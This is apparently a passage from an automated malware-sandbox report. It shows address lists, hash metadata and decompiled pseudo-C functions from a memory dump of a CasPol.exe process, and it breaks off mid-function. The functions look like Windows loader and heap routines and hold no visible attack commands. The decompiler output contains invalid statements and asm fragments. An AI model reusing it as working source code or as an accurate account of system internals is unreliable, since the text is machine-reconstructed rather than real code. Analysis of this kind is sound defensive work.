                                                                  0x01465965
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01465967
                                                                  0x01465967
                                                                  0x0146596b
                                                                  0x0146596d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0146596f
                                                                  0x01465971
                                                                  0x01465971
                                                                  0x01465974
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01465974
                                                                  0x00000000
                                                                  0x01465967
                                                                  0x0146595b
                                                                  0x01465942
                                                                  0x01465863
                                                                  0x01422143
                                                                  0x01422143
                                                                  0x01422149
                                                                  0x0142214f
                                                                  0x014222f1
                                                                  0x014222f6
                                                                  0x00000000
                                                                  0x01422173
                                                                  0x01422173
                                                                  0x0142217d
                                                                  0x01422181
                                                                  0x01422186
                                                                  0x014659ae
                                                                  0x014659b2
                                                                  0x014659b5
                                                                  0x014659b7
                                                                  0x014659ba
                                                                  0x014659cd
                                                                  0x014659d1
                                                                  0x014659d5
                                                                  0x014659d9
                                                                  0x014659db
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014659dd
                                                                  0x014659dd
                                                                  0x014659e1
                                                                  0x014659e4
                                                                  0x014659e7
                                                                  0x014659ee
                                                                  0x014659ee
                                                                  0x014659f3
                                                                  0x014659f3
                                                                  0x00000000
                                                                  0x01422186
                                                                  0x0142214f
                                                                  0x01422106
                                                                  0x01422266
                                                                  0x014220d8
                                                                  0x014220da
                                                                  0x014220e0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 326ac4c4ce5de7c3f88ad650fb9b82b58cb21a58e86ae08b21fd894a05a42c01
                                                                  • Instruction ID: 606ae82affb9712f391994365a13805a694cd65e8e304f7269cfa75a69470aec
                                                                  • Opcode Fuzzy Hash: 326ac4c4ce5de7c3f88ad650fb9b82b58cb21a58e86ae08b21fd894a05a42c01
                                                                  • Instruction Fuzzy Hash: ADF144306083128FDB26CB2CC440B2B7BE5AF95368F54851FE9949B3B1D7B4C881CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 67%
                                                                  			E0142513A(intOrPtr __ecx, void* __edx) {
                                                                  				signed int _v8;
                                                                  				signed char _v16;
                                                                  				intOrPtr _v20;
                                                                  				intOrPtr _v24;
                                                                  				char _v28;
                                                                  				signed int _v32;
                                                                  				signed int _v36;
                                                                  				signed int _v40;
                                                                  				intOrPtr _v44;
                                                                  				intOrPtr _v48;
                                                                  				char _v63;
                                                                  				char _v64;
                                                                  				signed int _v72;
                                                                  				signed int _v76;
                                                                  				signed int _v80;
                                                                  				signed int _v84;
                                                                  				signed int _v88;
                                                                  				signed char* _v92;
                                                                  				signed int _v100;
                                                                  				signed int _v104;
                                                                  				char _v105;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t157;
                                                                  				signed int _t159;
                                                                  				signed int _t160;
                                                                  				unsigned int* _t161;
                                                                  				intOrPtr _t165;
                                                                  				signed int _t172;
                                                                  				signed char* _t181;
                                                                  				intOrPtr _t189;
                                                                  				intOrPtr* _t200;
                                                                  				signed int _t202;
                                                                  				signed int _t203;
                                                                  				char _t204;
                                                                  				signed int _t207;
                                                                  				signed int _t208;
                                                                  				void* _t209;
                                                                  				intOrPtr _t210;
                                                                  				signed int _t212;
                                                                  				signed int _t214;
                                                                  				signed int _t221;
                                                                  				signed int _t222;
                                                                  				signed int _t226;
                                                                  				intOrPtr* _t232;
                                                                  				signed int _t233;
                                                                  				signed int _t234;
                                                                  				intOrPtr _t237;
                                                                  				intOrPtr _t238;
                                                                  				intOrPtr _t240;
                                                                  				void* _t245;
                                                                  				signed int _t246;
                                                                  				signed int _t247;
                                                                  				void* _t248;
                                                                  				void* _t251;
                                                                  				void* _t252;
                                                                  				signed int _t253;
                                                                  				signed int _t255;
                                                                  				signed int _t256;
                                                                  
                                                                  				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                                  				_v8 =  *0x14ed360 ^ _t255;
                                                                  				_v32 = _v32 & 0x00000000;
                                                                  				_t251 = __edx;
                                                                  				_t237 = __ecx;
                                                                  				_t212 = 6;
                                                                  				_t245 =  &_v84;
                                                                  				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                                  				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                                  				_v48 = __ecx;
                                                                  				_v36 = _t207;
                                                                  				_t157 = memset(_t245, 0, _t212 << 2);
                                                                  				_t256 = _t255 + 0xc;
                                                                  				_t246 = _t245 + _t212;
                                                                  				if(_t207 == 2) {
                                                                  					_t247 =  *(_t237 + 0x60);
                                                                  					_t208 =  *(_t237 + 0x64);
                                                                  					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                                  					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                                  					_v104 = _t159;
                                                                  					_v76 = _t159;
                                                                  					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                                  					_v100 = _t160;
                                                                  					_v72 = _t160;
                                                                  					L19:
                                                                  					_v80 = _t208;
                                                                  					_v84 = _t247;
                                                                  					L8:
                                                                  					_t214 = 0;
                                                                  					if( *(_t237 + 0x74) > 0) {
                                                                  						_t82 = _t237 + 0x84; // 0x124
                                                                  						_t161 = _t82;
                                                                  						_v92 = _t161;
                                                                  						while( *_t161 >> 0x1f != 0) {
                                                                  							_t200 = _v92;
                                                                  							if( *_t200 == 0x80000000) {
                                                                  								break;
                                                                  							}
                                                                  							_t214 = _t214 + 1;
                                                                  							_t161 = _t200 + 0x10;
                                                                  							_v92 = _t161;
                                                                  							if(_t214 <  *(_t237 + 0x74)) {
                                                                  								continue;
                                                                  							}
                                                                  							goto L9;
                                                                  						}
                                                                  						_v88 = _t214 << 4;
                                                                  						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                                  						_t165 = 0;
                                                                  						asm("adc eax, [ecx+edx+0x7c]");
                                                                  						_v24 = _t165;
                                                                  						_v28 = _v40;
                                                                  						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                                  						_t221 = _v40;
                                                                  						_v16 =  *_v92;
                                                                  						_v32 =  &_v28;
                                                                  						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                                  							goto L9;
                                                                  						}
                                                                  						_t240 = _v48;
                                                                  						if( *_v92 != 0x80000000) {
                                                                  							goto L9;
                                                                  						}
                                                                  						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                                  						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                                  						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                                  						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                                  						_t226 = 0;
                                                                  						_t181 = _t251 + 0x66;
                                                                  						_v88 = 0;
                                                                  						_v92 = _t181;
                                                                  						do {
                                                                  							if( *((char*)(_t181 - 2)) == 0) {
                                                                  								goto L31;
                                                                  							}
                                                                  							_t226 = _v88;
                                                                  							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                                  								_t181 = E0143D0F0(1, _t226 + 0x20, 0);
                                                                  								_t226 = _v40;
                                                                  								 *(_t226 + 8) = _t181;
                                                                  								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                                  								L34:
                                                                  								if(_v44 == 0) {
                                                                  									goto L9;
                                                                  								}
                                                                  								_t210 = _v44;
                                                                  								_t127 = _t210 + 0x1c; // 0x1c
                                                                  								_t249 = _t127;
                                                                  								E01412280(_t181, _t127);
                                                                  								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                                  								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                                  								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                                  									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                                  								}
                                                                  								_t189 = L01414620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                                  								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                                  								if(_t189 != 0) {
                                                                  									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                                  									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                                  									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                                  									 *_t232 = _t232 + 0x10;
                                                                  									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                                  									E0143F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                                  									_t256 = _t256 + 0xc;
                                                                  								}
                                                                  								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                                  								L0140FFB0(_t210, _t249, _t249);
                                                                  								_t222 = _v76;
                                                                  								_t172 = _v80;
                                                                  								_t208 = _v84;
                                                                  								_t247 = _v88;
                                                                  								L10:
                                                                  								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                                  								_v44 = _t238;
                                                                  								if(_t238 != 0) {
                                                                  									 *0x14eb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                                  									_v44();
                                                                  								}
                                                                  								_pop(_t248);
                                                                  								_pop(_t252);
                                                                  								_pop(_t209);
                                                                  								return L0143B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                                  							}
                                                                  							_t181 = _v92;
                                                                  							L31:
                                                                  							_t226 = _t226 + 1;
                                                                  							_t181 =  &(_t181[0x18]);
                                                                  							_v88 = _t226;
                                                                  							_v92 = _t181;
                                                                  						} while (_t226 < 4);
                                                                  						goto L34;
                                                                  					}
                                                                  					L9:
                                                                  					_t172 = _v104;
                                                                  					_t222 = _v100;
                                                                  					goto L10;
                                                                  				}
                                                                  				_t247 = _t246 | 0xffffffff;
                                                                  				_t208 = _t247;
                                                                  				_v84 = _t247;
                                                                  				_v80 = _t208;
                                                                  				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                                  					_t233 = _v72;
                                                                  					_v105 = _v64;
                                                                  					_t202 = _v76;
                                                                  				} else {
                                                                  					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                                  					_v105 = 1;
                                                                  					if(_v63 <= _t204) {
                                                                  						_v63 = _t204;
                                                                  					}
                                                                  					_t202 = _v76 |  *(_t251 + 0x40);
                                                                  					_t233 = _v72 |  *(_t251 + 0x44);
                                                                  					_t247 =  *(_t251 + 0x38);
                                                                  					_t208 =  *(_t251 + 0x3c);
                                                                  					_v76 = _t202;
                                                                  					_v72 = _t233;
                                                                  					_v84 = _t247;
                                                                  					_v80 = _t208;
                                                                  				}
                                                                  				_v104 = _t202;
                                                                  				_v100 = _t233;
                                                                  				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                                  					_t237 = _v48;
                                                                  					_v105 = 1;
                                                                  					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                                  						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                                  						_t237 = _v48;
                                                                  					}
                                                                  					_t203 = _t202 |  *(_t251 + 0xb8);
                                                                  					_t234 = _t233 |  *(_t251 + 0xbc);
                                                                  					_t247 = _t247 &  *(_t251 + 0xb0);
                                                                  					_t208 = _t208 &  *(_t251 + 0xb4);
                                                                  					_v104 = _t203;
                                                                  					_v76 = _t203;
                                                                  					_v100 = _t234;
                                                                  					_v72 = _t234;
                                                                  					_v84 = _t247;
                                                                  					_v80 = _t208;
                                                                  				}
                                                                  				if(_v105 == 0) {
                                                                  					_v36 = _v36 & 0x00000000;
                                                                  					_t208 = 0;
                                                                  					_t247 = 0;
                                                                  					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                                  					goto L19;
                                                                  				} else {
                                                                  					_v36 = 1;
                                                                  					goto L8;
                                                                  				}
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba30266cf1bc6bb02e9e06e385b8c5dd7c12d6bf1b7bc4312e3857ac9d51a4f8
                                                                  • Instruction ID: 18f8e0ee8044a99b4e03af22e75430c5579ab70372ba2718540448aa55b6accd
                                                                  • Opcode Fuzzy Hash: ba30266cf1bc6bb02e9e06e385b8c5dd7c12d6bf1b7bc4312e3857ac9d51a4f8
                                                                  • Instruction Fuzzy Hash: 9DC122755083818FD354CF28C580A6AFBF1BF88318F14496EF9998B362D771E885CB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 74%
                                                                  			E014203E2(signed int __ecx, signed int __edx) {
                                                                  				signed int _v8;
                                                                  				signed int _v12;
                                                                  				signed int _v16;
                                                                  				signed int _v20;
                                                                  				signed int _v24;
                                                                  				signed int _v28;
                                                                  				signed int _v32;
                                                                  				signed int _v36;
                                                                  				intOrPtr _v40;
                                                                  				signed int _v44;
                                                                  				signed int _v48;
                                                                  				char _v52;
                                                                  				char _v56;
                                                                  				char _v64;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed int _t56;
                                                                  				signed int _t58;
                                                                  				char* _t64;
                                                                  				intOrPtr _t65;
                                                                  				signed int _t74;
                                                                  				signed int _t79;
                                                                  				char* _t83;
                                                                  				intOrPtr _t84;
                                                                  				signed int _t93;
                                                                  				signed int _t94;
                                                                  				signed char* _t95;
                                                                  				signed int _t99;
                                                                  				signed int _t100;
                                                                  				signed char* _t101;
                                                                  				signed int _t105;
                                                                  				signed int _t119;
                                                                  				signed int _t120;
                                                                  				void* _t122;
                                                                  				signed int _t123;
                                                                  				signed int _t127;
                                                                  
                                                                  				_v8 =  *0x14ed360 ^ _t127;
                                                                  				_t119 = __ecx;
                                                                  				_t105 = __edx;
                                                                  				_t118 = 0;
                                                                  				_v20 = __edx;
                                                                  				_t120 =  *(__ecx + 0x20);
                                                                  				if(E01420548(__ecx, 0) != 0) {
                                                                  					_t56 = 0xc000022d;
                                                                  					L23:
                                                                  					return L0143B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                                  				} else {
                                                                  					_v12 = _v12 | 0xffffffff;
                                                                  					_t58 = _t120 + 0x24;
                                                                  					_t109 =  *(_t120 + 0x18);
                                                                  					_t118 = _t58;
                                                                  					_v16 = _t58;
                                                                  					E0140B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                                  					_v52 = 0x18;
                                                                  					_v48 = 0;
                                                                  					0x840 = 0x40;
                                                                  					if( *0x14e7c1c != 0) {
                                                                  					}
                                                                  					_v40 = 0x840;
                                                                  					_v44 = _t105;
                                                                  					_v36 = 0;
                                                                  					_v32 = 0;
                                                                  					if(E01417D50() != 0) {
                                                                  						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                  					} else {
                                                                  						_t64 = 0x7ffe0384;
                                                                  					}
                                                                  					if( *_t64 != 0) {
                                                                  						_t65 =  *[fs:0x30];
                                                                  						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                                  						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                                  							_t100 = E01417D50();
                                                                  							__eflags = _t100;
                                                                  							if(_t100 == 0) {
                                                                  								_t101 = 0x7ffe0385;
                                                                  							} else {
                                                                  								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                  							}
                                                                  							__eflags =  *_t101 & 0x00000020;
                                                                  							if(( *_t101 & 0x00000020) != 0) {
                                                                  								_t118 = _t118 | 0xffffffff;
                                                                  								_t109 = 0x1485;
                                                                  								E01477016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					_t105 = 0;
                                                                  					while(1) {
                                                                  						_push(0x60);
                                                                  						_push(5);
                                                                  						_push( &_v64);
                                                                  						_push( &_v52);
                                                                  						_push(0x100021);
                                                                  						_push( &_v12);
                                                                  						_t122 = E01439830();
                                                                  						if(_t122 >= 0) {
                                                                  							break;
                                                                  						}
                                                                  						__eflags = _t122 - 0xc0000034;
                                                                  						if(_t122 == 0xc0000034) {
                                                                  							L38:
                                                                  							_t120 = 0xc0000135;
                                                                  							break;
                                                                  						}
                                                                  						__eflags = _t122 - 0xc000003a;
                                                                  						if(_t122 == 0xc000003a) {
                                                                  							goto L38;
                                                                  						}
                                                                  						__eflags = _t122 - 0xc0000022;
                                                                  						if(_t122 != 0xc0000022) {
                                                                  							break;
                                                                  						}
                                                                  						__eflags = _t105;
                                                                  						if(__eflags != 0) {
                                                                  							break;
                                                                  						}
                                                                  						_t109 = _t119;
                                                                  						_t99 = E014769A6(_t119, __eflags);
                                                                  						__eflags = _t99;
                                                                  						if(_t99 == 0) {
                                                                  							break;
                                                                  						}
                                                                  						_t105 = _t105 + 1;
                                                                  					}
                                                                  					if( !_t120 >= 0) {
                                                                  						L22:
                                                                  						_t56 = _t120;
                                                                  						goto L23;
                                                                  					}
                                                                  					if( *0x14e7c04 != 0) {
                                                                  						_t118 = _v12;
                                                                  						_t120 = L0147A7AC(_t119, _t118, _t109);
                                                                  						__eflags = _t120;
                                                                  						if(_t120 >= 0) {
                                                                  							goto L10;
                                                                  						}
                                                                  						__eflags =  *0x14e7bd8;
                                                                  						if( *0x14e7bd8 != 0) {
                                                                  							L20:
                                                                  							if(_v12 != 0xffffffff) {
                                                                  								_push(_v12);
                                                                  								E014395D0();
                                                                  							}
                                                                  							goto L22;
                                                                  						}
                                                                  					}
                                                                  					L10:
                                                                  					_push(_v12);
                                                                  					_t105 = _t119 + 0xc;
                                                                  					_push(0x1000000);
                                                                  					_push(0x10);
                                                                  					_push(0);
                                                                  					_push(0);
                                                                  					_push(0xf);
                                                                  					_push(_t105);
                                                                  					_t120 = E014399A0();
                                                                  					if(_t120 < 0) {
                                                                  						__eflags = _t120 - 0xc000047e;
                                                                  						if(_t120 == 0xc000047e) {
                                                                  							L51:
                                                                  							_t74 = E01473540(_t120);
                                                                  							_t119 = _v16;
                                                                  							_t120 = _t74;
                                                                  							L52:
                                                                  							_t118 = 0x1485;
                                                                  							E013FB1E1(_t120, 0x1485, 0, _t119);
                                                                  							goto L20;
                                                                  						}
                                                                  						__eflags = _t120 - 0xc000047f;
                                                                  						if(_t120 == 0xc000047f) {
                                                                  							goto L51;
                                                                  						}
                                                                  						__eflags = _t120 - 0xc0000462;
                                                                  						if(_t120 == 0xc0000462) {
                                                                  							goto L51;
                                                                  						}
                                                                  						_t119 = _v16;
                                                                  						__eflags = _t120 - 0xc0000017;
                                                                  						if(_t120 != 0xc0000017) {
                                                                  							__eflags = _t120 - 0xc000009a;
                                                                  							if(_t120 != 0xc000009a) {
                                                                  								__eflags = _t120 - 0xc000012d;
                                                                  								if(_t120 != 0xc000012d) {
                                                                  									_v28 = _t119;
                                                                  									_push( &_v56);
                                                                  									_push(1);
                                                                  									_v24 = _t120;
                                                                  									_push( &_v28);
                                                                  									_push(1);
                                                                  									_push(2);
                                                                  									_push(0xc000007b);
                                                                  									_t79 = E0143AAF0();
                                                                  									__eflags = _t79;
                                                                  									if(_t79 >= 0) {
                                                                  										__eflags =  *0x14e8474 - 3;
                                                                  										if( *0x14e8474 != 3) {
                                                                  											 *0x14e79dc =  *0x14e79dc + 1;
                                                                  										}
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  						goto L52;
                                                                  					}
                                                                  					if(E01417D50() != 0) {
                                                                  						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                  					} else {
                                                                  						_t83 = 0x7ffe0384;
                                                                  					}
                                                                  					if( *_t83 != 0) {
                                                                  						_t84 =  *[fs:0x30];
                                                                  						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                                  						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                                  							_t94 = E01417D50();
                                                                  							__eflags = _t94;
                                                                  							if(_t94 == 0) {
                                                                  								_t95 = 0x7ffe0385;
                                                                  							} else {
                                                                  								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                  							}
                                                                  							__eflags =  *_t95 & 0x00000020;
                                                                  							if(( *_t95 & 0x00000020) != 0) {
                                                                  								E01477016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                                  						if( *0x14e8708 != 0) {
                                                                  							_t118 =  *0x7ffe0330;
                                                                  							_t123 =  *0x14e7b00; // 0x0
                                                                  							asm("ror esi, cl");
                                                                  							 *0x14eb1e0(_v12, _v20, 0x20);
                                                                  							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                                  							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                                  							asm("sbb esi, esi");
                                                                  							_t120 =  ~_t50 & _t93;
                                                                  						} else {
                                                                  							_t120 = 0;
                                                                  						}
                                                                  					}
                                                                  					if( !_t120 >= 0) {
                                                                  						L19:
                                                                  						_push( *_t105);
                                                                  						E014395D0();
                                                                  						 *_t105 =  *_t105 & 0x00000000;
                                                                  						goto L20;
                                                                  					}
                                                                  					_t120 = L01407F65(_t119);
                                                                  					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                                  						__eflags = _t120;
                                                                  						if(_t120 < 0) {
                                                                  							goto L19;
                                                                  						}
                                                                  						 *(_t119 + 0x64) = _v12;
                                                                  						goto L22;
                                                                  					}
                                                                  					goto L19;
                                                                  				}
                                                                  			}








































                                                                  0x0142051d
                                                                  0x0142051f
                                                                  0x01420524
                                                                  0x00000000
                                                                  0x01420524
                                                                  0x01420515
                                                                  0x01420517
                                                                  0x01464e7a
                                                                  0x01464e7c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464e85
                                                                  0x00000000
                                                                  0x01464e85
                                                                  0x00000000
                                                                  0x01420517

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24ff489a7a1d94977334aaa8038a6fbaee9a4bea86ad1b3ea94b7256b3b66159
                                                                  • Instruction ID: 9937a6579c114c9d93779900bad9e0a952108caeb909d8fb6ca40d4b26def4a3
                                                                  • Opcode Fuzzy Hash: 24ff489a7a1d94977334aaa8038a6fbaee9a4bea86ad1b3ea94b7256b3b66159
                                                                  • Instruction Fuzzy Hash: E8910B71E002259BEF219A6DC844BAE7BE8AB14728F490267F910A73F1D7749D81C781
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 39%
                                                                  			E0148B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                                  				char _v8;
                                                                  				signed int _v12;
                                                                  				signed int _t80;
                                                                  				signed int _t83;
                                                                  				intOrPtr _t89;
                                                                  				signed int _t92;
                                                                  				signed char _t106;
                                                                  				signed int* _t107;
                                                                  				intOrPtr _t108;
                                                                  				intOrPtr _t109;
                                                                  				signed int _t114;
                                                                  				void* _t115;
                                                                  				void* _t117;
                                                                  				void* _t119;
                                                                  				void* _t122;
                                                                  				signed int _t123;
                                                                  				signed int* _t124;
                                                                  
                                                                  				_t106 = _a12;
                                                                  				if((_t106 & 0xfffffffc) != 0) {
                                                                  					return 0xc000000d;
                                                                  				}
                                                                  				if((_t106 & 0x00000002) != 0) {
                                                                  					_t106 = _t106 | 0x00000001;
                                                                  				}
                                                                  				_t109 =  *0x14e7b9c; // 0x0
                                                                  				_t124 = L01414620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                                  				if(_t124 != 0) {
                                                                  					 *_t124 =  *_t124 & 0x00000000;
                                                                  					_t124[1] = _t124[1] & 0x00000000;
                                                                  					_t124[4] = _t124[4] & 0x00000000;
                                                                  					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                                  						L13:
                                                                  						_push(_t124);
                                                                  						if((_t106 & 0x00000002) != 0) {
                                                                  							_push(0x200);
                                                                  							_push(0x28);
                                                                  							_push(0xffffffff);
                                                                  							_t122 = E01439800();
                                                                  							if(_t122 < 0) {
                                                                  								L33:
                                                                  								if((_t124[4] & 0x00000001) != 0) {
                                                                  									_push(4);
                                                                  									_t64 =  &(_t124[1]); // 0x4
                                                                  									_t107 = _t64;
                                                                  									_push(_t107);
                                                                  									_push(5);
                                                                  									_push(0xfffffffe);
                                                                  									L014395B0();
                                                                  									if( *_t107 != 0) {
                                                                  										_push( *_t107);
                                                                  										E014395D0();
                                                                  									}
                                                                  								}
                                                                  								_push(_t124);
                                                                  								_push(0);
                                                                  								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                  								L37:
                                                                  								L014177F0();
                                                                  								return _t122;
                                                                  							}
                                                                  							_t124[4] = _t124[4] | 0x00000002;
                                                                  							L18:
                                                                  							_t108 = _a8;
                                                                  							_t29 =  &(_t124[0x105]); // 0x414
                                                                  							_t80 = _t29;
                                                                  							_t30 =  &(_t124[5]); // 0x14
                                                                  							_t124[3] = _t80;
                                                                  							_t123 = 0;
                                                                  							_t124[2] = _t30;
                                                                  							 *_t80 = _t108;
                                                                  							if(_t108 == 0) {
                                                                  								L21:
                                                                  								_t112 = 0x400;
                                                                  								_push( &_v8);
                                                                  								_v8 = 0x400;
                                                                  								_push(_t124[2]);
                                                                  								_push(0x400);
                                                                  								_push(_t124[3]);
                                                                  								_push(0);
                                                                  								_push( *_t124);
                                                                  								_t122 = E01439910();
                                                                  								if(_t122 != 0xc0000023) {
                                                                  									L26:
                                                                  									if(_t122 != 0x106) {
                                                                  										L40:
                                                                  										if(_t122 < 0) {
                                                                  											L29:
                                                                  											_t83 = _t124[2];
                                                                  											if(_t83 != 0) {
                                                                  												_t59 =  &(_t124[5]); // 0x14
                                                                  												if(_t83 != _t59) {
                                                                  													L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                                  												}
                                                                  											}
                                                                  											_push( *_t124);
                                                                  											E014395D0();
                                                                  											goto L33;
                                                                  										}
                                                                  										 *_a16 = _t124;
                                                                  										return 0;
                                                                  									}
                                                                  									if(_t108 != 1) {
                                                                  										_t122 = 0;
                                                                  										goto L40;
                                                                  									}
                                                                  									_t122 = 0xc0000061;
                                                                  									goto L29;
                                                                  								} else {
                                                                  									goto L22;
                                                                  								}
                                                                  								while(1) {
                                                                  									L22:
                                                                  									_t89 =  *0x14e7b9c; // 0x0
                                                                  									_t92 = L01414620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                                  									_t124[2] = _t92;
                                                                  									if(_t92 == 0) {
                                                                  										break;
                                                                  									}
                                                                  									_t112 =  &_v8;
                                                                  									_push( &_v8);
                                                                  									_push(_t92);
                                                                  									_push(_v8);
                                                                  									_push(_t124[3]);
                                                                  									_push(0);
                                                                  									_push( *_t124);
                                                                  									_t122 = E01439910();
                                                                  									if(_t122 != 0xc0000023) {
                                                                  										goto L26;
                                                                  									}
                                                                  									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                                  								}
                                                                  								_t122 = 0xc0000017;
                                                                  								goto L26;
                                                                  							}
                                                                  							_t119 = 0;
                                                                  							do {
                                                                  								_t114 = _t124[3];
                                                                  								_t119 = _t119 + 0xc;
                                                                  								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                                  								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                                  								_t123 = _t123 + 1;
                                                                  								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                                  							} while (_t123 < _t108);
                                                                  							goto L21;
                                                                  						}
                                                                  						_push(0x28);
                                                                  						_push(3);
                                                                  						_t122 = L013FA7B0();
                                                                  						if(_t122 < 0) {
                                                                  							goto L33;
                                                                  						}
                                                                  						_t124[4] = _t124[4] | 0x00000001;
                                                                  						goto L18;
                                                                  					}
                                                                  					if((_t106 & 0x00000001) == 0) {
                                                                  						_t115 = 0x28;
                                                                  						_t122 = L0148E7D3(_t115, _t124);
                                                                  						if(_t122 < 0) {
                                                                  							L9:
                                                                  							_push(_t124);
                                                                  							_push(0);
                                                                  							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                  							goto L37;
                                                                  						}
                                                                  						L12:
                                                                  						if( *_t124 != 0) {
                                                                  							goto L18;
                                                                  						}
                                                                  						goto L13;
                                                                  					}
                                                                  					_t15 =  &(_t124[1]); // 0x4
                                                                  					_t117 = 4;
                                                                  					_t122 = L0148E7D3(_t117, _t15);
                                                                  					if(_t122 >= 0) {
